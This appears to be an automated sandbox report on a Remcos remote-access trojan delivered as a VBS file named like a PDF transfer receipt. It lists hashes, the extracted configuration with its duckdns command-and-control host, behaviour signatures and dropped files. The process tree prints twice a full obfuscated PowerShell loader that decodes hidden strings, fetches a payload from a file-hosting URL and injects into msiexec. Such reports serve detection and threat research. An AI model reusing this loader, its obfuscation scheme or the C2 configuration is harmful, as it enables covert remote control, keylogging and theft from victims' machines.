Overview

overview

10

Static

static

1

Recibo de ...df.vbs

windows7-x64

10

Recibo de ...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 05:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Recibo de transferencia·pdf.vbs

  • Size

    80KB

  • MD5

    a510a741cf02891a5ae7268b7b92b9b8

  • SHA1

    2740b1d3da34dab2396388ebb2c97763a3164ce5

  • SHA256

    b1475086f2f81e2aca88d89cb0620f04e8d0b0a20b956821a0d2efe1b65ce060

  • SHA512

    f8b09143c1fde918ef01c508c781af213c934d332956c43acbaba6116cd3d3874db8315d1e15eeb8da33e52fc0898569b8c95a5540051be3de48731cf89fb091

  • SSDEEP

    1536:sjYl/iQZBql+3LAtEhHt1TtcjQ+yztqwT7C25jmiS8ybyf:sjYB7ZAoHCyzMy75y2f

Score
10/10
remcosremotehostdiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Recibo de transferencia·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3020
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:764
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:2056

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    47cb7157fc372260a1eecab5cce63f22

    SHA1

    a261605ef12dc6de87358dd452004bbfac6b3dae

    SHA256

    0250c4426245142130f75e10d84cd012d9355425d29e77598bc6d5070e27bb33

    SHA512

    5155fe14f7e23cd7091965ca62e1a006ab3995ef6eb0fdeeb83e136f3ebb29053d0c1a63a29085926401b3c9dcea7f35efcc585d4882332bef3786f3e4e1854d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Margenindstilling.Sys
    Filesize

    470KB

    MD5

    2f6d014bfb8401243b95a2d5190524bc

    SHA1

    813a93f3ecce3e6ad2c08d90794246b628c53e30

    SHA256

    4e8209f1210bbc4d89b9894389a5d95902d1b6ef80c651701cc77bb77302ceeb

    SHA512

    715c7eef4a5a83dd91a38ae4bbfc8ec04c29c2a4e3a3534e21c1f30f7a62c80d1952e9b9cc4fa67e2cb55953ca5cdf957c4deabe293edf745ef1e6e523a47fb7

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HPYNHQBCCGQS0BGHV4L6.temp
    Filesize

    7KB

    MD5

    9e5061aaa108ee49ca298c97624639fc

    SHA1

    19dfa8c950259f338d1c0d84b14ca84a0eb66d81

    SHA256

    3336892c504da0b67e15deab6c1632ef7c64d32523f53611edd28d114a14988f

    SHA512

    08345757c0ef41ffe4d6bab90cf59aee131299e06b786bf231cbc35d2ef294a025c8e13e7927c1ae5b6998edc3e8d3cec4647751062f016331032dc4dc270a67

    Download Submit

  • memory/764-18-0x00000000065A0000-0x000000000922D000-memory.dmp

    Filesize

    44.6MB

    Download

  • memory/2056-43-0x0000000000FB0000-0x0000000002012000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2056-40-0x0000000000FB0000-0x0000000002012000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3020-7-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3020-12-0x000007FEF609E000-0x000007FEF609F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3020-14-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3020-11-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3020-9-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3020-8-0x000007FEF5DE0000-0x000007FEF677D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3020-4-0x000007FEF609E000-0x000007FEF609F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3020-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3020-5-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

    Download